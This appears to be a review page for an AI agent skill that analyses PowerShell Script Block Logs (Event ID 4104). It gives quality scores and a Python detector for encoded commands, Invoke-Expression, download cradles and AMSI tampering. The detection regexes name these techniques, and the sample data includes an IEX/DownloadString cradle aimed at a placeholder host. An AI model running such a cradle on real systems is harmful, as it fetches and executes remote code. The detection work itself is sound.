Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated commands, encoded payloads, and living-off-the-land techniques. Uses python-evtx to extract and reconstruct multi-block scripts, applies entropy analysis and pattern matching for Base64-encoded commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts.
72
66%
Does it follow best practices?
Impact
Pending
No eval scenarios have been run
Passed
No known issues
Optimize this skill with Tessl
npx tessl skill review --optimize ./skills/analyzing-powershell-script-block-logging/SKILL.md
Quality
Discovery
82%
Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.
This is a highly specific and technically detailed description that excels at naming concrete actions and including domain-appropriate trigger terms for security forensics analysts. Its main weakness is the absence of an explicit 'Use when...' clause, which would help Claude know exactly when to select this skill over others. The description is well-written in third person and avoids vague language.
Suggestions
Add an explicit 'Use when...' clause, e.g., 'Use when the user asks to analyze EVTX files, investigate PowerShell execution logs, hunt for obfuscated scripts, or perform forensic analysis of Event ID 4104 logs.'
| Dimension | Reasoning | Score |
|---|---|---|
| Specificity | Lists multiple specific concrete actions: parsing PowerShell Script Block Logs (Event ID 4104), extracting and reconstructing multi-block scripts, applying entropy analysis and pattern matching, detecting Base64-encoded commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts. | 3 / 3 |
| Completeness | The 'what' is thoroughly covered with specific capabilities and techniques. However, there is no explicit 'Use when...' clause or equivalent trigger guidance telling Claude when to select this skill, which caps this dimension at 2 per the rubric guidelines. | 2 / 3 |
| Trigger Term Quality | Excellent coverage of natural keywords a security analyst would use: 'PowerShell', 'Script Block Logs', 'Event ID 4104', 'EVTX', 'obfuscated commands', 'encoded payloads', 'living-off-the-land', 'Base64', 'Invoke-Expression', 'AMSI bypass', 'download cradles'. These are highly specific and natural terms in the threat hunting/forensics domain. | 3 / 3 |
| Distinctiveness / Conflict Risk | Extremely distinct niche: Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files with specific detection techniques. This is unlikely to conflict with any other skill due to its highly specialized forensic/security focus and precise technical scope. | 3 / 3 |
| Total | | 11 / 12 Passed |
Implementation
50%
Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.
The skill provides a reasonable overview of PowerShell Script Block Log analysis with some concrete code snippets, but falls short on full actionability—key detection logic is described rather than implemented, and the referenced `scripts/agent.py` is unexplained. The workflow lacks validation checkpoints important for forensic analysis, and the prerequisites/when-to-use sections contain generic filler that wastes tokens.
Suggestions
Replace the prose detection heuristics (step 4) with executable Python code showing actual pattern matching against ScriptBlockText, including entropy calculation
Provide a complete executable example for multi-block script reconstruction rather than just describing the approach in prose
Add validation checkpoints: verify EVTX file opens correctly, confirm Event ID 4104 events exist, validate reconstructed scripts are complete (MessageNumber matches MessageTotal)
Remove or significantly trim the 'When to Use' and 'Prerequisites' sections—Claude doesn't need to be told when SOC analysts need structured procedures or that Python 3.8+ is required
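The pipeline that the description and the suggestions above call for, written here as an added example rather than the skill's own `scripts/agent.py`: parse Event ID 4104 records, reconstruct multi-fragment script blocks with a MessageNumber/MessageTotal completeness check, compute Shannon entropy, and run pattern matching for `-EncodedCommand` payloads (decoded from UTF-16LE Base64 and scanned again), Invoke-Expression, download cradles and AMSI tampering strings. The XML records, script block IDs and payload are constructed sample data, not real log entries; in a real run each record's XML would come from python-evtx's `Evtx(path).records()` / `record.xml()`, which is why the parser takes XML text. The heuristic names, the regexes and the 5.0-bit entropy threshold are this example's own choices.

```python
"""Added example (not the skill's own code): reconstruct and triage PowerShell
Script Block Logging (Event ID 4104) fragments from EVTX-style XML records."""
import base64
import math
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_4104(xml_text):
    """Return the 4104 fields needed for reconstruction, or None for other event IDs."""
    root = ET.fromstring(xml_text)
    eid = root.find("e:System/e:EventID", NS)
    if eid is None or (eid.text or "").strip() != "4104":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {
        "id": data.get("ScriptBlockId", ""),
        "num": int(data.get("MessageNumber") or 1),
        "total": int(data.get("MessageTotal") or 1),
        "text": data.get("ScriptBlockText", ""),
        "path": data.get("Path", ""),
    }


def reconstruct(events):
    """Join fragments per ScriptBlockId in MessageNumber order.
    Returns {ScriptBlockId: (script_text, complete)}; complete is False when the
    fragment numbers seen are not exactly 1..MessageTotal (validation checkpoint)."""
    parts, totals = defaultdict(dict), {}
    for ev in events:
        parts[ev["id"]][ev["num"]] = ev["text"]
        totals[ev["id"]] = ev["total"]
    result = {}
    for sid, frags in parts.items():
        complete = set(frags) == set(range(1, totals[sid] + 1))
        result[sid] = ("".join(frags[n] for n in sorted(frags)), complete)
    return result


def shannon_entropy(s):
    """Bits per character; long Base64 blobs score well above ordinary script text."""
    if not s:
        return 0.0
    n, counts = len(s), defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


# Detection heuristics (constructed for this example, all case-insensitive).
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)
PATTERNS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "amsi_tamper": re.compile(r"amsi(?:utils|initfailed|scanbuffer)", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}


def decode_encoded_command(text):
    """-EncodedCommand carries UTF-16LE text as Base64; return it decoded, or None."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(script_text, entropy_threshold=5.0):
    """Findings for one reconstructed script block: matched heuristics, entropy,
    and the decoded -EncodedCommand payload (scanned again) when one is present."""
    findings = {name for name, rx in PATTERNS.items() if rx.search(script_text)}
    decoded = decode_encoded_command(script_text)
    if decoded is not None:
        findings.add("encoded_command")
        findings |= {name for name, rx in PATTERNS.items() if rx.search(decoded)}
    entropy = shannon_entropy(script_text)
    if entropy > entropy_threshold:
        findings.add("high_entropy")
    return {"findings": sorted(findings), "entropy": round(entropy, 2), "decoded": decoded}


def analyze_records(xml_records):
    """Parse, reconstruct and triage; returns {ScriptBlockId: report}."""
    events = [ev for ev in (parse_4104(x) for x in xml_records) if ev]
    report = {}
    for sid, (text, complete) in reconstruct(events).items():
        report[sid] = dict(triage(text), complete=complete)
    return report


# Constructed sample records (not real log data): one encoded command split across
# two 4104 fragments, plus a benign single-fragment block.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SID_A, SID_B = "aaaaaaaa-0000-0000-0000-000000000001", "bbbbbbbb-0000-0000-0000-000000000002"


def _record(sid, num, total, text):
    return ('<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            "<System><EventID>4104</EventID></System><EventData>"
            f'<Data Name="MessageNumber">{num}</Data><Data Name="MessageTotal">{total}</Data>'
            f'<Data Name="ScriptBlockText">{text}</Data><Data Name="ScriptBlockId">{sid}</Data>'
            '<Data Name="Path"></Data></EventData></Event>')


SAMPLE_XML = [
    _record(SID_A, 1, 2, "powershell.exe -enc " + _ENC[:40]),
    _record(SID_A, 2, 2, _ENC[40:]),
    _record(SID_B, 1, 1, "Get-ChildItem C:\\Temp | Measure-Object"),
]

if __name__ == "__main__":
    for sid, r in analyze_records(SAMPLE_XML).items():
        print(sid, "complete" if r["complete"] else "INCOMPLETE", r["findings"], r["entropy"])
```

Feeding only the first fragment of SID_A to `reconstruct` yields `complete=False`, which is the point of the MessageNumber/MessageTotal check: a partially decoded `-enc` blob on a lone fragment would otherwise look like a short, truncated payload rather than a missed event.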
| Dimension | Reasoning | Score |
|---|---|---|
| Conciseness | The 'When to Use' section is somewhat generic and padded (e.g., 'When SOC analysts need structured procedures for this analysis type' adds little). Prerequisites like 'Familiarity with security operations concepts' are unnecessary for Claude. However, the core instructions are reasonably tight. | 2 / 3 |
| Actionability | There are some concrete elements (pip install command, code snippet for Base64 decoding, CLI invocation), but the detection heuristics in step 4 are described rather than implemented with executable code. The multi-block reconstruction example is described in prose without actual executable code showing the concatenation logic. The main script invocation references `scripts/agent.py` without explaining what it is or how to create it. | 2 / 3 |
| Workflow Clarity | Steps 1-5 provide a reasonable sequence, but there are no validation checkpoints. There's no guidance on verifying that EVTX parsing succeeded, no error handling for malformed events, and no feedback loop for when detection heuristics produce false positives or miss entries. For a security analysis workflow involving potentially complex multi-block reconstruction, validation steps are important. | 2 / 3 |
| Progressive Disclosure | Content is organized with headers and examples, but everything is inline in a single file. The detection heuristics, MITRE ATT&CK mappings, and report generation could benefit from references to separate detailed files. The skill is moderate in length but could be better structured with clear pointers to deeper resources. | 2 / 3 |
| Total | | 8 / 12 Passed |
Validation
90%
Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.
Validation — 10 / 11 Passed
Validation for skill structure
| Criteria | Description | Result |
|---|---|---|
| frontmatter_unknown_keys | Unknown frontmatter key(s) found; consider removing or moving to metadata | Warning |
| Total | | 10 / 11 Passed |
888bbe4